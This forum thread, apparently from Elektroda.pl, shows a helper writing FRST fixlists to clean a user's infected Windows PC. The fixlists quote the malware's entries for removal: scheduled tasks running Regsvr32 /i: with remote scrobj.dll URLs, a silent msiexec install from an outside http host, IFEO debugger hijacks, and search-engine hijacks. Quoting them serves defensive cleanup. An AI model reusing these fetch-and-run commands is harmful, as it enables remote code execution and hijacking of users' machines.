Elektroda.pl

Request to check an FRST log

jarhead184 23 May 2017 21:49 516 6
  • Helpful post
    #2 23 May 2017 22:30
    Kolobos
    Computer specialist

    Uninstall: AVG PC TuneUp 2015

    Run Fixlist.txt for FRST:
    Task: {3963C34B-12C8-4F84-B2FC-1CFDEDDDAF7E} - System32\Tasks\{CE8BEB7B-EA7C-4DFB-B9A8-D4BD9F53A457} => pcalua.exe -a "C:\Program Files (x86)\AVG Web TuneUp\UNINSTALL.exe" -c /PROMPT /UNINSTALL
    Task: {70AB8BFB-7ABB-4DCC-B6DA-FDFAD4FF8751} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe [2015-02-25] (AVG Technologies)
    Task: {D45AD514-3C92-4F0A-B1EC-66693B33E78D} - System32\Tasks\KarolWobblesBiocyclesV2 => Rundll32.exe ComfitsRends.dll,main 7 1 <==== UWAGA
    Task: {D634706C-6C0C-481E-8E20-365DBE986043} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj88RUF8MTLSRWU3N8FdOTF3MTlYRjwcOUU1RUY5MdNYRF== scrobj.dll
    Task: {EEF912A3-60B7-4636-9937-9243D052E508} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj88RUF8MTLSRWU3N8FdOTF3MTlYRjwcOUU1RUY5MdNYRF== scrobj.dll
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88RUF8MTLSRWU3N8FdOTF3MTlYRjwcOUU1RUY5MdNYRF== /q
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\Policies\Explorer: []
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: I - I:\Setup.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {558b0a00-8b61-11e5-810d-e4d53dbd1688} - H:\setup.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {57228b08-fe5c-11e5-8bdc-e4d53dbd1688} - F:\setup.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {5c78e6f1-a95f-11e4-ae10-e4d53dbd1688} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL F:\Common_Handset_USB_Driver.exe
    HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\...\MountPoints2: {d7058cb1-9db3-11e5-bc0b-e4d53dbd1688} - I:\Setup.exe
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    IFEO\taskmgr.exe: [Debugger]
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\MapShare-status@tomtom.com [nie znaleziono]
    FF NewTab: Mozilla\Firefox\Profiles\ydp27rbf.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=deb910716caf3839c4766e2g8zatfc6t0tae4q2o9g
    FF Homepage: Mozilla\Firefox\Profiles\ydp27rbf.default -> hxxp://www.luckysearch123.com?type=hp&ts=...;z=deb910716caf3839c4766e2g8zatfc6t0tae4q2o9g




    FF Extension: (Brak nazwy) - C:\Users\Karol\AppData\Roaming\Mozilla\Firefox\Profiles\ydp27rbf.default\extensions\arthurj8283@gmail.com [nie znaleziono]
    CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type...23eac3d1b1b8cf14a99g9zdtez0w8e0w5gacbb&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> luck
    CHR HKU\S-1-5-21-2378718645-2658661782-1109129007-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx
    2017-05-11 16:09 - 2017-05-15 15:32 - 00000000 _____ C:\Windows\SysWOW64\3333333
    2017-05-11 16:08 - 2017-05-17 16:26 - 00000000 _____ C:\Windows\SysWOW64\00
    2017-05-11 16:08 - 2017-05-15 15:32 - 00000000 _____ C:\Windows\SysWOW64\1111111
    2017-05-09 15:16 - 2017-05-09 15:16 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-09 14:32 - 2017-05-17 16:35 - 00000000 _____ C:\Windows\SysWOW64\1111
    2017-05-07 14:48 - 2017-05-23 20:17 - 00000000 ____D C:\AdwCleaner
    2017-05-05 15:27 - 2017-05-17 16:26 - 00000000 _____ C:\Windows\SysWOW64\11
    2017-04-27 21:33 - 2017-04-27 21:33 - 00000000 ____D C:\Windows\psgo
    2017-04-25 21:27 - 2017-05-22 10:18 - 00000000 ____D C:\Program Files\MK
    2017-05-17 16:26 - 2017-04-20 08:02 - 00000000 _____ C:\Windows\SysWOW64\22
    2017-05-17 16:26 - 2017-04-17 20:07 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-05-07 20:51 - 2017-04-17 21:17 - 00000000 _____ C:\Windows\SysWOW64\2
    EmptyTemp:

    After it has run, delete the C:\FRST folder and that's all.

    0
  • #3 23 May 2017 23:40
    jarhead184
    Level 2

    Thank you very much. Also, I am worried about HomeGroupUser$ among the user names. I never created such an account. Please help: is everything OK, or does someone have access to my computer? Request to check an FRST log

    0
  • #6 24 May 2017 21:31
    Kolobos
    Computer specialist

    Uninstall: Google Toolbar for Internet Explorer

    Run Fixlist.txt for FRST:
    Task: {51742968-CF07-401A-8C6D-050693312C8C} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe <==== UWAGA
    Hosts:
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    S2 TuneUp.UtilitiesSvc; "C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe" [X]
    S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
    S3 TuneUpUtilitiesDrv; \??\C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [X]
    2015-01-08 19:51 - 2015-01-15 22:57 - 0000387 _____ () C:\Users\aaa\AppData\Roaming\sp_data.sys

    Delete C:\FRST.

    0
  • #7 10 Jun 2017 06:22
    jarhead184
    Level 2

    Thank you very much for the help. Regards

    0